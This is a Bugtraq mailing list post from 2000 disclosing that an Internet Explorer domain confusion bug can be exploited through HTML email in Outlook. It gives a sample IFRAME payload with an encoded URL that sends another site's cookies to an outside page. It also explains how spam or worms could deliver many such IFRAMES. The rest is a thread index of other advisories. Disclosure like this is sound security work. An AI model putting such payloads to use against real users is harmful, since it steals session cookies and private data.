Bugtraq mailing list archives
IE Domain Confusion Vulnerability is an Email problem also
From: rms2000 () BELLATLANTIC NET (Richard M. Smith)
Date: Fri, 12 May 2000 08:33:48 -0400
Hi, This same IE bug can also be exploited from an HTML Email message in Outlook and Outlook Express. The trick is to put the magic URL in an HTML IFRAME tag. Example: <iframe src="http://www.peacefire.org%2fsecurity%2fiecookies%2f showcookie.html%3f.yahoo.com/"> </iframe> A malicious Email message could include many IFRAMEs to grab cookies from different domains. The cookies are stolen when the message is read. Using an Email message, an attack can be directed at a particular person or a group of people without them every going to a Web site. The exploit could also be included in a spam Email message or in the payload of an Email worm/virus. I suspect that the same trick works in newsgroup messages, but I haven't had the time to run the experiment. This is a pretty bad bug. People's private data at Web sites is at risk here. Richard ========================================== Richard M. Smith Internet consultant Email: rms2000 () bellatlantic net http://www.tiac.net/users/smiths ==========================================
Current thread:
- Re: non-exec stack, (continued)
- Re: non-exec stack Casper Dik (May 09)
- Re: non-exec stack Nate Eldredge (May 10)
- »Ø¸´: Re: non-exec stac ZhaoQian (May 10)
- Alert: IIS ism.dll exposes file contents Cerberus Security Team (May 11)
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
- Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
- Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
- IE Domain Confusion Vulnerability Foo Bar (May 11)
- Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
- Eudora Sensitive to Long Filenames Ron Moritz (May 18)
- IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
- Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
- Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
- New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
- Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
- Microsoft Office 2000 Advisory dildog (May 12)